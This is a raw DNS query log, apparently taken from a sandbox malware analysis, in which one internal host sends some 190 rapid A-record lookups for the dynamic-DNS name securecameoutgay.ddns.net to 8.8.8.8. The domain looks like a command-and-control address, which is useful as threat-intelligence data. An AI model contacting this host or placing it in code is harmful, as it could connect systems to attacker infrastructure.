                                                    Oct 12, 2024 23:06:12.414277077 CEST192.168.2.148.8.8.80xbd2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.420675993 CEST192.168.2.148.8.8.80xbd2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.427644014 CEST192.168.2.148.8.8.80xbd2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.434345961 CEST192.168.2.148.8.8.80xbd2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.440953016 CEST192.168.2.148.8.8.80xbd2fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.447640896 CEST192.168.2.148.8.8.80x881Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.454263926 CEST192.168.2.148.8.8.80x881Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.460840940 CEST192.168.2.148.8.8.80x881Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.467634916 CEST192.168.2.148.8.8.80x881Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.474200010 CEST192.168.2.148.8.8.80x881Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.480859995 CEST192.168.2.148.8.8.80xdf65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.487396002 CEST192.168.2.148.8.8.80xdf65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.494098902 CEST192.168.2.148.8.8.80xdf65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.500803947 CEST192.168.2.148.8.8.80xdf65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.507395029 CEST192.168.2.148.8.8.80xdf65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.514209032 CEST192.168.2.148.8.8.80x7828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.520845890 CEST192.168.2.148.8.8.80x7828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.527398109 CEST192.168.2.148.8.8.80x7828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.534137011 CEST192.168.2.148.8.8.80x7828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.540934086 CEST192.168.2.148.8.8.80x7828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.552546978 CEST192.168.2.148.8.8.80x59f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.559979916 CEST192.168.2.148.8.8.80x59f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.566766977 CEST192.168.2.148.8.8.80x59f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.574028015 CEST192.168.2.148.8.8.80x59f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.580688953 CEST192.168.2.148.8.8.80x59f4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.587245941 CEST192.168.2.148.8.8.80x3d2bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.593592882 CEST192.168.2.148.8.8.80x3d2bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.599797010 CEST192.168.2.148.8.8.80x3d2bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.606471062 CEST192.168.2.148.8.8.80x3d2bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.613168955 CEST192.168.2.148.8.8.80x3d2bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.619920969 CEST192.168.2.148.8.8.80x4023Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.629724979 CEST192.168.2.148.8.8.80x4023Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.636360884 CEST192.168.2.148.8.8.80x4023Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.642858982 CEST192.168.2.148.8.8.80x4023Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.649333954 CEST192.168.2.148.8.8.80x4023Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.656286001 CEST192.168.2.148.8.8.80x97d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.662822008 CEST192.168.2.148.8.8.80x97d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.669902086 CEST192.168.2.148.8.8.80x97d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.676395893 CEST192.168.2.148.8.8.80x97d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.682949066 CEST192.168.2.148.8.8.80x97d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.689690113 CEST192.168.2.148.8.8.80xb7d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.696202040 CEST192.168.2.148.8.8.80xb7d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.703006029 CEST192.168.2.148.8.8.80xb7d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.709677935 CEST192.168.2.148.8.8.80xb7d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.716200113 CEST192.168.2.148.8.8.80xb7d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.723120928 CEST192.168.2.148.8.8.80x7ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.729394913 CEST192.168.2.148.8.8.80x7ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.736457109 CEST192.168.2.148.8.8.80x7ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.743058920 CEST192.168.2.148.8.8.80x7ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.749562979 CEST192.168.2.148.8.8.80x7ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.756217003 CEST192.168.2.148.8.8.80xe012Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.762669086 CEST192.168.2.148.8.8.80xe012Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.769474030 CEST192.168.2.148.8.8.80xe012Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.775928974 CEST192.168.2.148.8.8.80xe012Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.782429934 CEST192.168.2.148.8.8.80xe012Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.789453030 CEST192.168.2.148.8.8.80x9c66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.796740055 CEST192.168.2.148.8.8.80x9c66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.803638935 CEST192.168.2.148.8.8.80x9c66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.810358047 CEST192.168.2.148.8.8.80x9c66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.817028046 CEST192.168.2.148.8.8.80x9c66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.823834896 CEST192.168.2.148.8.8.80x9c65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.830554962 CEST192.168.2.148.8.8.80x9c65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.837023973 CEST192.168.2.148.8.8.80x9c65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.843676090 CEST192.168.2.148.8.8.80x9c65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.850506067 CEST192.168.2.148.8.8.80x9c65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.857482910 CEST192.168.2.148.8.8.80xa347Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.864375114 CEST192.168.2.148.8.8.80xa347Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.870893955 CEST192.168.2.148.8.8.80xa347Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.877712965 CEST192.168.2.148.8.8.80xa347Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.884048939 CEST192.168.2.148.8.8.80xa347Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.891079903 CEST192.168.2.148.8.8.80x6a0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.900475025 CEST192.168.2.148.8.8.80x6a0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.908796072 CEST192.168.2.148.8.8.80x6a0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.917967081 CEST192.168.2.148.8.8.80x6a0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.924442053 CEST192.168.2.148.8.8.80x6a0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.931138039 CEST192.168.2.148.8.8.80x81c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.938416004 CEST192.168.2.148.8.8.80x81c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.945236921 CEST192.168.2.148.8.8.80x81c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.951913118 CEST192.168.2.148.8.8.80x81c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.958827019 CEST192.168.2.148.8.8.80x81c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.965791941 CEST192.168.2.148.8.8.80x144aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.972834110 CEST192.168.2.148.8.8.80x144aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.979551077 CEST192.168.2.148.8.8.80x144aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.986582994 CEST192.168.2.148.8.8.80x144aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:12.993825912 CEST192.168.2.148.8.8.80x144aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.001449108 CEST192.168.2.148.8.8.80xcda1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.008477926 CEST192.168.2.148.8.8.80xcda1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.015711069 CEST192.168.2.148.8.8.80xcda1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.022670031 CEST192.168.2.148.8.8.80xcda1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.029874086 CEST192.168.2.148.8.8.80xcda1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.037693024 CEST192.168.2.148.8.8.80x1298Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.044889927 CEST192.168.2.148.8.8.80x1298Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.051752090 CEST192.168.2.148.8.8.80x1298Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.058285952 CEST192.168.2.148.8.8.80x1298Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.065586090 CEST192.168.2.148.8.8.80x1298Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.072889090 CEST192.168.2.148.8.8.80x74a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.079962969 CEST192.168.2.148.8.8.80x74a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.088603020 CEST192.168.2.148.8.8.80x74a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.097496986 CEST192.168.2.148.8.8.80x74a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.106278896 CEST192.168.2.148.8.8.80x74a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.115130901 CEST192.168.2.148.8.8.80xa6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.125236034 CEST192.168.2.148.8.8.80xa6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.134193897 CEST192.168.2.148.8.8.80xa6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.141556978 CEST192.168.2.148.8.8.80xa6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.153403044 CEST192.168.2.148.8.8.80xa6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.165182114 CEST192.168.2.148.8.8.80x6d5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.177316904 CEST192.168.2.148.8.8.80x6d5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.189927101 CEST192.168.2.148.8.8.80x6d5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.198784113 CEST192.168.2.148.8.8.80x6d5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.206346989 CEST192.168.2.148.8.8.80x6d5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.219885111 CEST192.168.2.148.8.8.80xe142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.232721090 CEST192.168.2.148.8.8.80xe142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.245003939 CEST192.168.2.148.8.8.80xe142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.256835938 CEST192.168.2.148.8.8.80xe142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.266804934 CEST192.168.2.148.8.8.80xe142Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.276913881 CEST192.168.2.148.8.8.80x1173Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.284774065 CEST192.168.2.148.8.8.80x1173Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.293850899 CEST192.168.2.148.8.8.80x1173Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.302247047 CEST192.168.2.148.8.8.80x1173Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.308893919 CEST192.168.2.148.8.8.80x1173Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.317120075 CEST192.168.2.148.8.8.80xe618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.323991060 CEST192.168.2.148.8.8.80xe618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.330609083 CEST192.168.2.148.8.8.80xe618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.337363958 CEST192.168.2.148.8.8.80xe618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.344624043 CEST192.168.2.148.8.8.80xe618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.352021933 CEST192.168.2.148.8.8.80xd69bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.360300064 CEST192.168.2.148.8.8.80xd69bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.367691040 CEST192.168.2.148.8.8.80xd69bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.374353886 CEST192.168.2.148.8.8.80xd69bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.383152962 CEST192.168.2.148.8.8.80xd69bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.389969110 CEST192.168.2.148.8.8.80xfd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.397746086 CEST192.168.2.148.8.8.80xfd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.404675007 CEST192.168.2.148.8.8.80xfd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.411617994 CEST192.168.2.148.8.8.80xfd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.418359995 CEST192.168.2.148.8.8.80xfd8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.426090002 CEST192.168.2.148.8.8.80x89a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.433945894 CEST192.168.2.148.8.8.80x89a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.440624952 CEST192.168.2.148.8.8.80x89a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.447798014 CEST192.168.2.148.8.8.80x89a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.455346107 CEST192.168.2.148.8.8.80x89a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.462114096 CEST192.168.2.148.8.8.80xb470Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.468841076 CEST192.168.2.148.8.8.80xb470Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.475723982 CEST192.168.2.148.8.8.80xb470Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.483134031 CEST192.168.2.148.8.8.80xb470Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.490253925 CEST192.168.2.148.8.8.80xb470Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.497441053 CEST192.168.2.148.8.8.80xb90bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.504272938 CEST192.168.2.148.8.8.80xb90bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.511320114 CEST192.168.2.148.8.8.80xb90bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.518521070 CEST192.168.2.148.8.8.80xb90bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.525846958 CEST192.168.2.148.8.8.80xb90bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.532769918 CEST192.168.2.148.8.8.80x57bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.539478064 CEST192.168.2.148.8.8.80x57bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.546433926 CEST192.168.2.148.8.8.80x57bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.553102970 CEST192.168.2.148.8.8.80x57bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.560265064 CEST192.168.2.148.8.8.80x57bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.566806078 CEST192.168.2.148.8.8.80xd38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.580507994 CEST192.168.2.148.8.8.80xd38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.587464094 CEST192.168.2.148.8.8.80xd38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.594392061 CEST192.168.2.148.8.8.80xd38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.601538897 CEST192.168.2.148.8.8.80xd38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.608541012 CEST192.168.2.148.8.8.80x6d12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.615444899 CEST192.168.2.148.8.8.80x6d12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.622369051 CEST192.168.2.148.8.8.80x6d12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.629015923 CEST192.168.2.148.8.8.80x6d12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.635361910 CEST192.168.2.148.8.8.80x6d12Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.641931057 CEST192.168.2.148.8.8.80xdf4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.648613930 CEST192.168.2.148.8.8.80xdf4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.655319929 CEST192.168.2.148.8.8.80xdf4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.662375927 CEST192.168.2.148.8.8.80xdf4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.669164896 CEST192.168.2.148.8.8.80xdf4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.676007032 CEST192.168.2.148.8.8.80xaf92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.682887077 CEST192.168.2.148.8.8.80xaf92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.689815998 CEST192.168.2.148.8.8.80xaf92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.696985006 CEST192.168.2.148.8.8.80xaf92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.704030037 CEST192.168.2.148.8.8.80xaf92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.710853100 CEST192.168.2.148.8.8.80x933aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.717395067 CEST192.168.2.148.8.8.80x933aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.724157095 CEST192.168.2.148.8.8.80x933aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.731111050 CEST192.168.2.148.8.8.80x933aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.737782001 CEST192.168.2.148.8.8.80x933aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.744724989 CEST192.168.2.148.8.8.80x7d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.751580000 CEST192.168.2.148.8.8.80x7d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.758564949 CEST192.168.2.148.8.8.80x7d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.765471935 CEST192.168.2.148.8.8.80x7d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.772167921 CEST192.168.2.148.8.8.80x7d67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.779102087 CEST192.168.2.148.8.8.80xde1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:13.785870075 CEST192.168.2.148.8.8.80xde1bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
